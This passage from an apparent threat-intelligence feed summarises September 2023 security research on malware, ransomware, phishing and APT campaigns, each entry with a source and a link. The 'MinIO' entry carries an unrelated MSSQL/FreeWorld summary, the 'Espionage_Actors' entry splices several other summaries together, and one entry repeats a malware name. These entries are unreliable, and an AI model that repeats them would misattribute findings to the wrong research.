Summary:: A custom phishing kit called W3LL Panel that is made to get around MFA and 16 other completely customized tools for business email compromise (BEC) attacks were available for purchase on the threat actor's secret underground market, W3LL Store, which catered to a closed community of at least 500 other threat actors.

Source: https://go.group-ib.com/hubfs/report/group-ib-w3ll-done-threat-report-2023.pdf

Intel Source:: TrendMicro

Intel Name:: RedLine_Vidar_Using_EV_Certificates_and_Switches_to_Ransomware

Date of Scan:: 2023-09-13

Impact:: MEDIUM

Summary:: Researchers from TrendMicro have discovered that the threat actors behind RedLine and Vidar are now disseminating ransomware payloads using the same delivery methods they employ to disseminate info stealers. By making their approaches versatile, the threat actors may be streamlining their activities. They looked into an instance where the victim had initially been exposed to information-stealing malware that had been signed using Extended Validation (EV) code signing certificates. But eventually, they began getting ransomware payloads over the same channel.

Source: https://www.trendmicro.com/en_us/research/23/i/redline-vidar-first-abuses-ev-certificates.html

Intel Source:: CERT-AGID

Intel Name:: Vidar_Malware_is_Back_to_Compromise_PEC_Mails

Date of Scan:: 2023-09-13

Impact:: LOW

Summary:: A new, large-scale malware campaign that targets other PEC emails and is distributed through a number of previously compromised Certified Email accounts is discovered and stopped by CERT-AGID with the assistance of the affected PEC Managers.

Source: https://cert-agid.gov.it/news/il-malware-vidar-torna-ad-insidiare-le-caselle-pec/

Intel Source:: IBM Security Intelligence

Intel Name:: Delivering_RATs_and_Stealers_via_Updated_DBatLoader

Date of Scan:: 2023-09-13

Impact:: LOW

Summary:: Researchers from IBM X-Force have discovered new features in DBatLoader malware samples distributed in recent email campaigns, indicating a higher risk of infection from common malware families linked to DBatLoader activities. Additionally, since late June, they have seen close to 20 email campaigns that send payloads including Remcos, Warzone, Formbook, and AgentTesla using the new DBatLoader loader.

Source: https://securityintelligence.com/posts/email-campaigns-leverage-updated-dbatloader-deliver-rats-stealers/

Intel Source:: Checkpoint

Intel Name:: Analyzing_a_Suspected_Remcos_Malware_Attack_on_Colombian_Firms

Date of Scan:: 2023-09-13

Impact:: LOW

Summary:: Researchers from Check Point have discovered a brand-new, extensive phishing effort that recently targeted more than 40 eminent businesses in Colombia across a variety of industries. The goal of the attackers is to covertly set up the infamous "Remcos" malware on the PCs of its victims. Remcos is an advanced "Swiss Army Knife" RAT that gives hackers complete control over the infected computer and may be used in a variety of assaults. Data theft, subsequent infections, and account takeover are common effects of a Remcos infection.

Source: https://research.checkpoint.com/2023/guarding-against-the-unseen-investigating-a-stealthy-remcos-malware-attack-on-colombian-firms/

Intel Source:: Zscaler

Intel Name:: A_Look_at_APT36_Modernized_Weaponry

Date of Scan:: 2023-09-13

Impact:: MEDIUM

Summary:: Researchers from Zscaler have found new malicious activities being carried out by the Pakistan-based advanced persistent threat group (APT36) that are intended to attack both Windows and Linux operating systems.

Source: https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal

Intel Source:: Symantec

Intel Name:: A_Failed_LockBit_Attack_Replaced_at_3AM_Ransomware

Date of Scan:: 2023-09-13

Impact:: HIGH

Summary:: A brand-new ransomware family going by the name of 3AM has appeared. It is employed in a single attack by a ransomware affiliate that tried to install LockBit on a target's network but switched to 3AM after LockBit was blocked, according to Symantec researchers. The Rust-written malware family 3AM appears to be a brand-new malware family. Before it starts encrypting files, the ransomware makes many attempts to shut down different services on the affected machine. After encryption is finished, Volume Shadow (VSS) copies are tried to be deleted. It is currently unknown if its creators have any connections to recognized cybercrime organizations.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit

Intel Source:: Symantec

Intel Name:: Redfly_APT_Group_Targating_Critical_Infrastructure

Date of Scan:: 2023-09-12

Impact:: MEDIUM

Summary:: Researchers from Symantec have discovered evidence that a threat actor organization they refer to as Redfly used the ShadowPad Trojan to hack a national grid in an Asian nation for as long as six months earlier this year. Multiple computers on the organization's network were compromised, and the attackers were successful in stealing credentials.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/critical-infrastructure-attacks

Intel Source:: Fortinet

Intel Name:: Malicious_Word_Document_Spreads_OriginBotnet

Date of Scan:: 2023-09-12

Impact:: LOW

Summary:: Researchers at FortiGate have discovered a sophisticated phishing effort that employs a Microsoft Word document lure to disseminate a trio of threats—Agent Tesla, OriginBotnet, and OriginBotnet—in order to collect a variety of data from infected Windows devices.

Source: https://www.fortinet.com/blog/threat-research/originbotnet-spreads-via-malicious-word-document

Intel Source:: Sentinelone

Intel Name:: New_MetaStealer_Malware_Targeting_macOS_Users

Date of Scan:: 2023-09-12

Impact:: LOW

Summary:: Researchers at SentinelOne have seen attackers using the malware, which is known as MetaStealer, to target Mac users across a variety of industries in an effort to infiltrate corporate networks. The MetaStealer malware is typically concealed in malicious documents or files, occasionally in files that have been made to resemble Adobe software or files.

Source: https://www.sentinelone.com/blog/macos-metastealer-new-family-of-obfuscated-go-infostealers-spread-in-targeted-attacks/

Intel Source:: Symantec

Intel Name:: Espionage_Actors_target_critical_infrastructure

Date of Scan:: 2023-09-12

Impact:: LOW

Summary:: Researchers from Symantec have discovered evidence that a threat actor organization they refer to as Redfly used the ShadowPad Trojan to hack a national grid in an Asian nation for as long as six months earlier this year. Multiple computers on the organization's network were compromised, and the attackers were successful in stealing credentials. Researchers at FortiGate have discovered a sophisticated phishing effort that employs a Microsoft Word document lure to disseminate a trio of threats—Agent Tesla, OriginBotnet, and OriginBotnet—in order to collect a variety of data from infected Windows devices. CTIN has observed a new campaign that is associated with previous malicious one connected to Evilnum. EvilNum is a threat group that is characterized by an evolving toolkit and sector-specific and geographic-specific targeting. The reserachers made deep technical analysis on observations between 2018 and 2020. More recently CyberReason has described one of their newest tools called PyVil Remote Access Trojan (RAT). Symantec’s Threat Hunter Team has discovered evidence that a threat actor group Symantec calls Redfly used the ShadowPad Trojan to compromise a national grid in an Asian country for as long as six months earlier this year. The attackers managed to steal credentials and compromise multiple computers on the organization’s network.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks

Intel Source:: Securelist

Intel Name:: Potential_Supply_Chain_Attack_Against_Linux_Machines

Date of Scan:: 2023-09-12

Impact:: MEDIUM

Summary:: Researchers from Securelist have examined the samples that are targeting Linux systems. When they made the decision to look into a group of suspicious domains, they came across one such persistent attack.

Source: https://securelist.com/backdoored-free-download-manager-linux-malware/110465/

Intel Source:: Welivesecurity

Intel Name:: Introducing_Charming_Kitten_New_Backdoor_Sponsor

Date of Scan:: 2023-09-12

Impact:: MEDIUM

Summary:: Researchers from ESET have discovered that the Iranian threat actor Charming Kitten is connected to a recent round of attacks that target various targets in Brazil, Israel, and the United Arab Emirates using a hidden Ballistic Bobcat backdoor they have dubbed Sponsor. Victimology patterns suggest that the group primarily singles out education, government, and healthcare organizations, as well as human rights activists and journalists.

Source: https://www.welivesecurity.com/en/eset-research/sponsor-batch-filed-whiskers-ballistic-bobcats-scan-strike-backdoor/

Intel Source:: Cyber Threat Ivtelligence Network

Intel Name:: A_new_Evilnum_campaign

Date of Scan:: 2023-09-12

Impact:: LOW

Summary:: CTIN has observed a new campaign that is associated with previous malicious one connected to Evilnum. EvilNum is a threat group that is characterized by an evolving toolkit and sector-specific and geographic-specific targeting. The reserachers made deep technical analysis on observations between 2018 and 2020. More recently CyberReason has described one of their newest tools called PyVil Remote Access Trojan (RAT).

Source: https://cyberthreatintelligencenetwork.com/index.php/2023/09/08/potential-new-evilnum-campaign/

Intel Source:: Threatfabric

Intel Name:: Andromeda_latest_malware

Date of Scan:: 2023-09-12

Impact:: LOW

Summary:: ThreatFabric analysts observed a new malware family called Andromeda. The name comes from the URLs of the C2 servers used to create Remote Access sessions. Plus on the top of this malicious activity from threat actors focused on the country's traditional banking ecosystem, increased targeting of more modern financial services technologies has also been observed.

Source: https://www.threatfabric.com/blogs/andromeda-the-latest-brazilian-dto-malware-0

Intel Source:: ASEC

Intel Name:: Attacks_by_APT_Using_BlueShell_on_Korean_and_Thai_Targets

Date of Scan:: 2023-09-11

Impact:: LOW

Summary:: A backdoor called BlueShell is created in Go. It is accessible via GitHub and works with Windows, Linux, and Mac OS. Although it appears that the original GitHub repository has been removed, additional repositories still offer access to the BlueShell source code. Notably, the ReadMe file that contains the instructions is in Chinese, which raises the possibility that the author is a Chinese speaker.

Source: https://asec.ahnlab.com/en/56941/

Intel Source:: Zscaler

Intel Name:: Technical_Investigation_of_HijackLoader

Date of Scan:: 2023-09-11

Impact:: LOW

Summary:: Zscaler researchers have noticed a new malware loader known as HijackLoader is becoming more popular among cybercriminals for distributing different payloads like DanaBot, SystemBC, and RedLine Stealer. HijackLoader employs a modular architecture, a trait that most loaders lack, therefore even if it lacks advanced functionality, it may leverage a number of modules for code injection and execution.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader

Intel Source:: McAfee

Intel Name:: Agent_Tesla_Delivering_via_VBScript

Date of Scan:: 2023-09-11

Impact:: LOW

Summary:: Researchers from McAfee have discovered a version where Agent Tesla is disseminating via VBScript (VBS) files, deviating from its typical dissemination techniques. VBS files are script files that are used in Windows to automate operations, configure computers, and carry out different activities. Cybercriminals may also make advantage of them to spread malicious software and carry out damaging operations on computers.

Source: https://www.mcafee.com/blogs/security-news/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/

Intel Source:: Security Affairs

Intel Name:: The_brute_force_attacks_targeting_Cisco_ASA

Date of Scan:: 2023-09-11

Impact:: LOW

Summary:: Security Affairs researchers shared in their blog that Cisco has observed that Akira ransomware threat actors have been targeting Cisco VPNs that are not configured for multi-factor authentication to infiltrate organizations, and they have discovered instances where threat actors appear to be targeting organizations that do not configure multi-factor authentication for their VPN users.

Source: https://securityaffairs.com/150157/cyber-crime/cisco-asa-ransomware-attacks.html

Intel Source:: Truesec

Intel Name:: DarkGate_Loader_Malware_Leveraging_Microsoft_Teams

Date of Scan:: 2023-09-11

Impact:: MEDIUM

Summary:: The DarkGate Loader virus is delivered by a Microsoft Teams malware campaign, which the Truesec Cybersecurity Team has looked into. Microsoft Teams chat messages are delivered from two external Office 365 accounts that had been compromised before the campaign on August 29 between the hours of 11:25 and 12:25 UTC. The purpose of the message's content is to trick its recipients into downloading and running a malicious file that is hosted remotely.

Source: https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams

Intel Source:: Securelist

Intel Name:: An_Analysis_of_Cuba_Ransomware

Date of Scan:: 2023-09-11

Impact:: LOW

Summary:: Researchers from Securelist have examined the Cuba ransomware. They initially became aware of the group's offensives in late 2020. The name "Cuba" had not yet been given to the cyberterrorists; instead, they were known as "Tropical Scorpius" at the time. Organizations in the US, Canada, and Europe are the target of this. The gang has carried out a slew of impactful attacks against financial institutions, healthcare organizations, government organizations, and oil industries.

Source: https://securelist.com/cuba-ransomware/110533/

Intel Source:: Gteltsc

Intel Name:: Advanced_Attack_Groups_JavaScript_RATs_and_APT_Ransomware

Date of Scan:: 2023-09-08

Impact:: MEDIUM

Summary:: This article highlights Chimera Group targeting semiconductor and aerospace industries, a JavaScript RAT campaign in Asian government institutions, the Solorigate campaign's transition, Chinese APT groups turning to ransomware, and the PLEASE_READ_ME ransomware campaign targeting MySQL servers.

Source: https://gteltsc.vn/blog/thong-tin-cac-moi-de-doa-bao-mat-trong-thang-01-2021-9681.html

Intel Source:: Flashpoint

Intel Name:: Return_of_RisePro_Stealer_With_New_Updates

Date of Scan:: 2023-09-08

Impact:: LOW

Summary:: The RisePro thief made a comeback in July, according to its supplier, who claims that this new and enhanced version will provide clients with a better experience after going dark for almost seven months.

Source: https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/

Intel Source:: Checkmarx

Intel Name:: A_Comprehensive_Analysis_of_70_Layers_of_Info_Stealing_Malware

Date of Scan:: 2023-09-08

Impact:: LOW

Summary:: Researchers from Checkmarx have examined an intriguing sample that is covered in numerous obfuscation layers. These packages are quite difficult. The attackers have not yet understood that their aims cannot be concealed by any amount of obfuscation.

Source: https://checkmarx.com/blog/a-deep-dive-into-70-layers-of-obfuscated-info-stealer-malware/

Intel Source:: Esentire

Intel Name:: Fake_Browser_Updates_Distribute_Malware

Date of Scan:: 2023-09-08

Impact:: LOW

Summary:: Recently threat response unit researchers has discovered some evidence of cases related to LummaC2 across multiple industries. LummaC2 is an information stealer distributed as a Malware-as-a-Service (MaaS) offering on Russian-language forums. The reserachers suspect that it also has the ability to load additional malware onto the system. In a recent case in August, a user became infected with LummaC2, Amadey, and PrivateLoader after running a fake Chrome browser update.

Source: https://www.esentire.com/blog/fake-browser-updates-distribute-lummac-stealer-amadey-and-privateloader-malware

Intel Source:: Google Blog

Intel Name:: Another_Attack_on_Security_Researchers_by_North_Korean_Hackers

Date of Scan:: 2023-09-08

Impact:: MEDIUM

Summary:: In January 2021, Google made the initial discovery that DPRK attackers weren't targeting innocent, defenseless people or organizations, but rather the cybersecurity experts themselves. The attackers have returned, this time armed with a brand-new zero-day vulnerability, a fake software tool, and a stunningly broad phishing campaign.

Source: https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/

Intel Source:: ASEC

Intel Name:: Phishing_Campaign_Disguises_Emails_as_PDF_Viewer_Screens

Date of Scan:: 2023-09-08

Impact:: LOW

Summary:: AhnLab's Security Emergency Response Center (ASEC) has uncovered a phishing campaign distributing malicious script files posing as PDF document viewer screens. These emails contain filenames related to purchase orders and receipts to lure recipients. When opened, the attachment prompts users to enter their email passwords to access the document, displaying varying messages based on login attempts. After three tries, users are redirected to a legitimate PDF to mask the phishing attempt. The script can also send user data via Telegram for anonymity

Source: https://asec.ahnlab.com/en/56812/

Intel Source:: IBM Security Intelligence

Intel Name:: New_Hive0117_Phishing_Campaign_Delivering_DarkWatchman_Malware

Date of Scan:: 2023-09-08

Impact:: LOW

Summary:: IBM X-Force researchers have discovered a new phishing attack, probably launched by Hive0117, that targeted individuals working in the main Russian, Kazakh, Latvian, and Estonian energy, banking, transportation, and software security sectors.

Source: https://securityintelligence.com/x-force/new-hive0117-phishing-campaign-imitates-conscription-summons-deliver-darkwatchman-malware/

Intel Source:: CISA

Intel Name:: Multiple_APT_Groups_Exploiting_CVE_2022_47966_and_CVE_2022_42475

Date of Scan:: 2023-09-08

Impact:: MEDIUM

Summary:: Researchers from CISA have discovered signs of compromise (IOCs) as early as January 2023 at a company in the aerospace sector. The CVE-2022-47966 vulnerability was taken advantage of by nation-state advanced persistent threat (APT) actors to access a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move lateral through the network. The ManageEngine program is vulnerable and permits remote code execution. Other APT actors were seen making a presence on the company's firewall device by using CVE-2022-42475 as a means of attack.

Source: https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475_0.pdf

Intel Source:: ASEC

Intel Name:: RedEyes_CHM_Malware_Using_the_Topic_of_Fukushima_Wastewater_Release

Date of Scan:: 2023-09-08

Impact:: LOW

Summary:: ASEC researchers have discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company” covered in March of this year and also uses the same commands used in the “2.3. Persistence” stage in the attack process of the RedEyes group’s M2RAT malware.

Source: https://asec.ahnlab.com/en/56857/

Intel Source:: Checkpoint

Intel Name:: A_phishing_attack_using_Google_Looker_Studio

Date of Scan:: 2023-09-08

Impact:: LOW

Summary:: In their report, Check Point Harmony researchers are discussing how hackers are using social engineering with a Google domain, designed to elicit a user response and hand over credentials to crypto sites. In this attack, hackers are utilizing Google Looker Studio to host credential harvesting crypto sites.

Source: https://blog.checkpoint.com/security/phishing-via-google-looker-studio/

Intel Source:: Sysdig

Intel Name:: In_depth_analysis_of_Scarleteel_2_threat

Date of Scan:: 2023-09-07

Impact:: LOW

Summary:: In Sysdig post, their analysts provided a full detailed report about cyber attack that reverberated across the digital realm – SCARLETEEL. In their analysis this serious incident using the MITRE ATT&CK framework, where analysts are providing deep insights into the operational tactics of cyber adversaries.

Source: https://sysdig.com/blog/scarleteel-mitre-attack/

Intel Source:: Talos

Intel Name:: Cybercriminals_are_abusing_Advanced_Installer

Date of Scan:: 2023-09-07

Impact:: LOW

Summary:: Talos observed an ongoing cryptocurrency mining campaign that sends malicious payloads by abusing the tool Advanced Installer. This is a legitimate tool designed to create software packages for Windows. The software installers targeted in this campaign are specifically used for 3-D modeling and graphic design.

Source: https://blog.talosintelligence.com/cybercriminals-target-graphic-designers-with-gpu-miners/

Intel Source:: Trustwave

Intel Name:: Phishing_emails_abusing_another_Cloudflare_service

Date of Scan:: 2023-09-07

Impact:: LOW

Summary:: Trustwave is seeing a lot of phishing emails with URLs abusing another Cloudflare service which is r2.dev. The subjects of the phishing emails contain alarming or common keywords like statement paid, upgrade mail, purchase order, etc.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-bucket-of-phish-attackers-shift-tactics-with-cloudflare-r2-public-buckets/

Intel Source:: Seqrite

Intel Name:: New_Warp_Malware_Dropping_Modified_Stealerium_Infostealer

Date of Scan:: 2023-09-07

Impact:: LOW

Summary:: In order to address certain demands and vulnerabilities, cybercriminals started marketing and disseminating several stealthy malware variants. Stealer malware today, such the "Warp Stealer," is quite advanced and versatile. From infected PCs, they can collect useful data such as hardware specifications, network setups, browser history, and private information pertaining to finances and online activities.

Source: https://www.seqrite.com/blog/new-warp-malware-drops-modified-stealerium-infostealer/

Intel Source:: Malwarebytes

Intel Name:: Mac_users_targeted_in_new_malvertising_campaign_delivering_Atomic_Stealer

Date of Scan:: 2023-09-07

Impact:: LOW

Summary:: AMOS was first promoted as a Mac OS stealer with a strong focus on crypto assets in April 2023. It also included a file grabber and the ability to harvest passwords from browsers and Apple's keychain. A new version of the project was released at the end of June as a result of the developer's active work on it.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising

Intel Source:: Zscaler

Intel Name:: An_Examination_of_a_New_Stealing_Campaign

Date of Scan:: 2023-09-07

Impact:: LOW

Summary:: A new theft campaign known as the "Steal-It" campaign was just found by Zscaler ThreatLabz. In this campaign, the threat actors use modified versions of Nishang's Start-CaptureServer PowerShell script to steal and exfiltrate NTLMv2 hashes. They then run various system tasks, extract the data, and exfiltrate it utilizing Mockbin APIs.

Source: https://www.zscaler.com/blogs/security-research/steal-it-campaign

Intel Source:: Fortinet

Intel Name:: Spreading_New_Agent_Tesla_Variant_through_Excel_Document

Date of Scan:: 2023-09-07

Impact:: MEDIUM

Summary:: Researchers from FortiGuard have discovered a phishing campaign spreading a new Agent Tesla variant. To obtain initial access, this well-known malware family uses a data stealer and.Net-based Remote Access Trojan (RAT). For Malware-as-a-Service (MaaS), it is frequently utilized. When this campaign was thoroughly examined, everything from the initial phishing email to the acts of Agent Tesla installed on the victim's computer to the gathering of personal data from the harmed device was discovered.

Source: https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document

Intel Source:: PaloAlto

Intel Name:: More_deep_look_at_RedLine_Stealer_traffic

Date of Scan:: 2023-09-06

Impact:: LOW

Summary:: In July, 2023, Palo Alto team captrued a packet pcap) with a RedLine Stealer infection. Their analyses provided the details and more deeper look look at RedLine Stealer traffic.

Source: https://unit42.paloaltonetworks.com/wireshark-quiz-redline-stealer-answers/

Intel Source:: Morphisec

Intel Name:: New_Chaes_Malware_Variant_Targeting_Logistics_and_Financial_Sectors

Date of Scan:: 2023-09-06

Impact:: LOW

Summary:: Researchers at Morphisec have discovered a concerning pattern where many clients, mostly from the banking and logistics industries, were being attacked by a brand-new, highly developed Chaes malware version. Between April and June 2023, variants of the threat were seen to become more sophisticated.

Source: https://www.morphisec.com/hubfs/Morphisec_Chae$4_Threat_Profile.pdf

Intel Source:: Checkmarx

Intel Name:: Info_Stealing_Malware_Plagues_Open_Source_Ecosystem

Date of Scan:: 2023-09-06

Impact:: LOW

Summary:: From April to the middle of August, Checkmarx researchers have seen that threat actor PYTA31 has been actively disseminating "WhiteSnake" malware using malicious packages in the PyPI repository. Multiple operating systems can be targeted by the malware.

Source: https://checkmarx.com/blog/threat-actor-continues-to-plague-the-open-source-ecosystem-with-sophisticated-info-stealing-malware/

Intel Source:: ASEC

Intel Name:: Backdoor_Distribution_Through_Malicious_LNK

Date of Scan:: 2023-09-06

Impact:: LOW

Summary:: Malware that was formerly delivered in CHM format is now being spread in LNK format, according to ASEC experts. Through the mshta process, this malware runs other scripts that are located at a certain URL. Following that, it gets instructions from the threat actor's server to engage in more malicious actions.

Source: https://asec.ahnlab.com/en/56756/

Intel Source:: Emanuele Delucia

Intel Name:: Analysis_of_the_FBI_Operation_Duck_Hunt

Date of Scan:: 2023-09-06

Impact:: LOW

Summary:: The “Duck Hunt” campaign is linked to a specific campaign called “Operation Duck Hunt” that disrupted the Qakbot botnet. The name might have been chosen to symbolize the effort to track down and disable the Qakbot botnet, similar to shooting down ducks in the game.

Source: https://www.emanueledelucia.net/under-the-shellcode-of-operation-duck-hunt-analysis-of-the-fbis-ducks-killer/

Intel Source:: SOC Radar

Intel Name:: Dark_Web_Profile_of_Medusa_Ransomware

Date of Scan:: 2023-09-06

Impact:: LOW

Summary:: Cybersecurity professionals have been aware of the Medusa Ransomware (also known as MedusaLocker). The Medusa Ransomware gang collaborates with international affiliates while using the ransomware-as-a-service (RaaS) business model, expanding its reach and effect even further.

Source: https://socradar.io/dark-web-profile-medusa-ransomware-medusalocker/

Intel Source:: Zscaler

Intel Name:: Insights_into_DuckTail_operation

Date of Scan:: 2023-09-06

Impact:: LOW

Summary:: Zscaler ThreatLabz started intel collection for Ducktail operation back in May 2023. For last couple months of collectiing, Zscaler got some critical details about DuckTail’s operational framework. That collection gave Zscaler team a visibility into DuckTail’s end-to-end operations, spanning the entire kill chain from reconnaissance to post-compromise. Zscaler team got valuable insights into DuckTail’s intrusion techniques, compromise tactics, post-compromise procedures, and the underground economy.

Source: https://www.zscaler.com/blogs/security-research/look-ducktail

Intel Source:: Cyfirma

Intel Name:: New_MaaS_Prysmax_malware

Date of Scan:: 2023-09-06

Impact:: LOW

Summary:: The CYFIRMA research team has detected a new malware-as-a-service known as Prysmax. The malware is completely undetectable by the most of signature-based detections commonly employed by antivirus solutions. By manipulating file associations and executing alongside legitimate .exe processes, Prysmax stealer maximizes its reach and impact.

Source: https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/

Intel Name:: Cyberattack_by_APT28_Using_msedge_as_a_Bootloader

Date of Scan:: 2023-09-05

Impact:: LOW

Summary:: Researchers from CERT-UA have observed a deliberate cyber attack against a crucial Ukrainian energy infrastructure site. An email message with a phony sender address and a link to an archive, like "photo.zip," is being distributed to carry out the malicious scheme.

Source: https://cert.gov.ua/article/5702579

Intel Source:: Security Joes

Intel Name:: Hackers_Exploiting_MinIO_Storage_System

Date of Scan:: 2023-09-05

Impact:: LOW

Summary:: Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.

Source: https://www.securityjoes.com/post/new-attack-vector-in-the-cloud-attackers-caught-exploiting-object-storage-services

Intel Source:: Okta

Intel Name:: Okta_Warns_of_Social_Engineering_Attacks

Date of Scan:: 2023-09-04

Impact:: LOW

Summary:: Recent weeks have seen an increase in social engineering attacks against IT service desk staff, according to several U.S.-based Okta customers. The caller's tactic was to persuade the service desk staff to reset all multi-factor authentication (MFA) factors enrolled by highly privileged users.

Source: https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection

Intel Source:: ASEC

Intel Name:: Following_the_Spread_of_Fileless_Malware_Through_Spam_Emails

Date of Scan:: 2023-09-04

Impact:: LOW

Summary:: A phishing campaign that spreads via spam emails and runs a PE file (EXE) without placing the file on the user's computer has been uncovered by ASEC researchers. The malware strains AgentTesla, Remcos, and LimeRAT are finally executed by the malware attachment in the hta extension.

Source: https://asec.ahnlab.com/en/56512/

Intel Source:: Securonix Threat Labs

Intel Name:: FreeWorld_Ransomware_Attacks_on_MSSQL_Databases

Date of Scan:: 2023-09-04

Impact:: MEDIUM

Summary:: Infected Microsoft SQL Server (MSSQL) databases were being used to deliver Cobalt Strike and ransomware payloads, according to Securonix Threat Lab research. Using MSSQL as a beachhead, the attackers deploy a variety of payloads, including remote-access Trojans (RATs) and a fresh Mimic ransomware variant named FreeWorld, after first infiltrating the target machine.

Source: https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/

Intel Source:: Seqrite

Intel Name:: ZeroDay_Vulnerabilities_Detected_on_WinRAR

Date of Scan:: 2023-09-04

Impact:: MEDIUM

Summary:: In the widely used WinRAR software, the zero-day vulnerabilities CVE-2023-38831 and CVE-2023-40477 have been discovered. The possibility of remote code execution presented by these vulnerabilities raises serious security concerns. With half a billion users globally, it is a well-liked compression tool that is essential to numerous digital processes.

Source: https://www.seqrite.com/blog/threat-advisory-zero-day-vulnerabilities-detected-on-winrar/

Intel Source:: Interlab

Intel Name:: A_new_campaign_of_novel_RAT

Date of Scan:: 2023-09-02

Impact:: LOW

Summary:: On 8/28/2023, Interlab got some a sample which was sent to a journalist with highly targeted content luring the recipient to open the document. After checking it, Interlab discovered that after initial compromise, the execution of an AutoIT script that was used to perform process injection using a process hollowing technique. The injected process contained a novel RAT, which was named “SuperBear” due to naming conventions in the code.

Source: https://interlab.or.kr/archives/19416

Intel Source:: Talos

Intel Name:: Analyses_on_new_open_source_infostealer

Date of Scan:: 2023-09-02

Impact:: LOW

Summary:: This week’s edition of the Threat Source newsletter. Talos is seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SaphireStealer” which was analyzed by Talos reserachers and shared in their blog.

Source: https://blog.talosintelligence.com/new-open-source-infostealer-and-reflections-on-2023-so-far/

Intel Source:: Rapid7

Intel Name:: New_IDAT_Loader_executes_StealC_and_Lumma_Infostealers

Date of Scan:: 2023-09-02

Impact:: LOW

Summary:: Recently, Rapid7 discoverd the Fake Browser Update tricking users into executing malicious binaries. While analyzing the dropped binaries, Rapid7 determined a new loader is utilized in order to execute infostealers on compromised systems including StealC and Lumma.

Source: https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

Intel Source:: TrendMicro

Intel Name:: Taking_down_the_main_admin_of_phishing_as_a_service_16shop

Date of Scan:: 2023-09-01

Impact:: LOW

Summary:: TrendMicro did analyses and investigations on phishing-as-a-service 16shop through the years. Plus was mentioned about he partnership between Trend Micro and Interpol in taking down the main administrators and servers of this massive phishing campaign.

Source: https://www.trendmicro.com/en_us/research/23/i/revisiting-16shop-phishing-kit-trend-interpol-partnership.html

Intel Source:: Checkpoint

Intel Name:: Custom_Executable_Formats_From_Hidden_Bee_to_Rhadamanthys

Date of Scan:: 2023-09-01

Impact:: LOW

Summary:: The design and implementation of Hidden Bee coin miner and Rhadamanthys stealer considerably overlap. Custom executable formats, the usage of comparable virtual filesystems, the use of LUA scripts, identical routes to some of the components, reused functions, similar use of steganography, and overall related architecture are just a few examples of the similarities that are readily obvious.

Source: https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/

Intel Source:: Resecurity

Intel Name:: The_attacks_on_USPS_and_US_Citizens_for_data_theft

Date of Scan:: 2023-09-01

Impact:: LOW

Summary:: Resecurity has discovered a big-scale smishing campaign targeting the US Citizens. Similar scams have been noticed before targeting Fedex and UPS. The bad actors attributed to Chinese-speaking cybercriminals are leveraging a package tracking text scam sent via iMessage to collect personal (PII) and payment information from the victims with the goal of identity theft and credit card fraud. The cybercriminal group with associated campaign has been named "Smishing Triad" as it leverages smishing as the main attack vector and originates from China.

Source: https://www.resecurity.com/blog/article/smishing-triad-targeted-usps-and-us-citizens-for-data-theft

Intel Source:: Eclecticiq

Intel Name:: Decrypting_Key_Group_Ransomware

Date of Scan:: 2023-09-01

Impact:: LOW

Summary:: EclecticIQ analysts discovered that Key Group ransomware can be classified as a low-sophisticated threat actor. The ransomware samples contained multiple cryptographic mistakes that enabled EclecticIQ to create a decryption tool for this specific ransomware version built in August 03,2023. Key Group or KEYGROUP777, is a Russian-speaking cybercrime actor focusing on financial gain by selling Personal Identifying Information (PII) or initial access to compromised devices and obtaining ransom money.

Source: https://blog.eclecticiq.com/decrypting-key-group-ransomware-emerging-financially-motivated-cyber-crime-gang

Intel Source:: CERT-UA

Intel Name:: Exploitation_of_CVE_2023_38831

Date of Scan:: 2023-09-01

Impact:: LOW

Summary:: The Ukrainian CERT-UA government computer emergency response team has noted a cyberattack by the UAC-0057 group. It was discovered that the "Zbirnyk_tez_Y_23.rar" file contained an exploit for the CVE-2023-38831 vulnerability. If this exploit is successful, it will cause the BAT file "16872_16_2023_03049.pdf.cmd" to be launched, which will cause the LNK file "16872_16_2023_03049.lnk" to launch, which will then use the mshta.

Source: https://cert.gov.ua/article/5661411

Intel Source:: Talos

Intel Name:: An_Open_Source_Info_Stealer_Named_SapphireStealer

Date of Scan:: 2023-09-01

Impact:: LOW

Summary:: In December 2022, SapphireStealer was first published by the open-source community as an information stealing malware. Since then, it's been observed across a number of public malware repositories with increasing frequency. The researchers have moderate confidence that multiple entities are using SapphireStealer. They have separately improved and modified the original code base, extending it to support additional data exfiltration mechanisms.

Source: https://blog.talosintelligence.com/sapphirestealer-goes-open-source/

Intel Source:: Trustwave

Intel Name:: Malicious_PDFs

Date of Scan:: 2023-09-01

Impact:: LOW

